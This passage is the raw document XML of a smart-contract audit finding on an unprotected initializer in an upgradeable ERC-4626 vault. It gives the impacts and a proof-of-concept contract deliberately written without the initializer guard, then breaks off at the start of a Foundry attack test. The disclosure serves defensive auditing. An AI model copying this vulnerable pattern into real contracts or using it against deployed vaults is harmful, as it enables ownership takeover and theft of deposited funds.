    <w:p w14:paraId="4B68FD9B" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>S-02 — Unprotected initializer on UUPS YieldVault</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339EBCE0" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Severity: High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC0B543" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Location: contracts/vault/YieldVaultUpgradeable.sol — initialize (UUPS case study; production YieldVault.sol uses immutable constructor on testnet deploy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF6CE03" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="494A40E6" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A8A267" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>An upgradeable ERC-4626 vault implementation exposed a public initialize(address asset, address owner) without OpenZeppelin’s initializer modifier. Because the implementation contract’s constructor only called _disableInitializers() when correctly deployed behind a proxy, a mis-deployed implementation left on-chain could be initialized by anyone, setting owner and asset pointer arbitrarily and enabling _authorizeUpgrade hijack if paired with UUPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206B2402" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49512B5B" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F9189A" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Full ownership takeover of vault implementation / proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74319DEA" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Malicious upgrade to draining logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49635CD4" w14:textId="2E840F46" w:rsidR="00707638" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Theft of all underlying ERC-20 held by the vault</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BA345D" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13DC89D8" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF74DF5" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Proof of Concept — vulnerable version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5158C39D" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>// SPDX-License-Identifier: MIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55554104" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>pragma solidity ^0.8.24;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AC0E45" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DAC4269" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {Initializable} from "openzeppelin-contracts-upgradeable/contracts/proxy/utils/Initializable.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347C8BB7" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {UUPSUpgradeable} from "openzeppelin-contracts-upgradeable/contracts/proxy/utils/UUPSUpgradeable.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2908AF98" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {OwnableUpgradeable} from "openzeppelin-contracts-upgradeable/contracts/access/OwnableUpgradeable.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4511F7" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {ERC4626Upgradeable} from "openzeppelin-contracts-upgradeable/contracts/token/ERC20/extensions/ERC4626Upgradeable.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCF0FF6" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {ERC20Upgradeable} from "openzeppelin-contracts-upgradeable/contracts/token/ERC20/ERC20Upgradeable.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA44B66" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {IERC20} from "openzeppelin-contracts/contracts/token/ERC20/IERC20.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ED6BA3" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37470F0D" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>/// @dev VULNERABLE — missing `initializer` modifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C194076" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>contract YieldVaultUpgradeableVulnerable is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCAC76F" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    Initializable,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1151BBA1" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    ERC4626Upgradeable,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0797BBD9" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    OwnableUpgradeable,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630E3BB0" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    UUPSUpgradeable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3414B032" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B83F2A" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    function initialize(IERC20 asset_, address owner_) external {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5BEF4B" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        __ERC20_init("DeFiHub Yield Vault", "dhYV");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F80390" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        __ERC4626_init(asset_);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AD73C5" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">        __Ownable_init(owner_);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3F18D7" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A8ECDC" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C939E65" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    function _authorizeUpgrade(address) internal override onlyOwner {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FE7E38" w14:textId="563066CD" w:rsidR="004C355C" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E62550" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51CB0D56" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Foundry test — attacker hijacks ownership (vulnerable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D489D1" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>// SPDX-License-Identifier: MIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B7F2CA" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>pragma solidity ^0.8.24;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E9FD63" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BAA75CF" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>import {Test} from "forge-std/Test.sol";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557684E7" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
